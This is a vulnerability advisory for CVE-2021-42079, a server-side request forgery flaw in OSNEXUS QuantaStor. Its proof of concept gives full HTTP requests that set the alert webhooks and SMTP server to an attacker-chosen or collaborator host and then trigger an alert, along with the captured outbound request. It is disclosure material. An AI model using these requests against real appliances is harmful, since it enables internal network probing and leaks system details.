CVE-2021-42079

SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355

CVE CVE-2021-42079
Title SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Credits
Affected products
Product Affected Unaffected Unknown
OSNEXUS QuantaStor on Windows, Linux >= 0 to < 6.0.0.355 (semver)
everything else
CVSS Base score: 6.2 (MEDIUM)
References
Problem type(s) CWE-918 Server-Side Request Forgery (SSRF)
Date published
Last modified 11 Mar 2025 13:40 UTC

Description

An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */* Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1

The post request received by <TARGET> looks like this:
{
  ### Python FLASK stuff ####
 'endpoint': 'index',
  'method': 'POST',
  'cookies': ImmutableMultiDict([]),
  ### END Python FLASK stuff ####
  'data': b'{
  "attachments": [
   {
    "fallback": "[122] test / test.",
    "color": "#aa2222",
    "title": "[122] test",
    "text": "test",
    "fields": [  
     {    
      "title": "Alert Severity",    
      "value": "CRITICAL",    
      "short": false  
     },  {  
      "title": "Appliance",    
      "value": "quantastor (https://<HOSTNAME>)",    
      "short": true  
     },  {    
      "title": "System / Driver / Kernel Ver",    
      "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",    
      "short": false  
     },  {    
      "title": "System Startup",    
      "value": "Fri Aug  6 16-02-55 2021",    
      "short": true  
      },  {    
      "title": "SSID",    
      "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",    
      "short": true  
     },
    ],
    "footer": "QuantaStor Call-home Alert",
    "footer_icon": "https://platform.slack-edge.com/img/default_application_icon.png",
    "ts": 1628461774
   }
  ],
  "mrkdwn":true
 }',
 #### FLASK REQUEST STUFF #####
 'headers': {
  'Host': '<redacted>',
  'User-Agent': 'curl/7.58.0',
  'Accept': '*/*',
  'Content-Type': 'application/json',
  'Content-Length': '790'
 },
 'args': ImmutableMultiDict([]),
 'form': ImmutableMultiDict([]),
 'remote_addr': '217.103.63.173',
 'path': '/payload/58',
 'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF #####

Solution(s)

Upgrade to the latest version of OSNEXUS QuantaStor.

JSON version.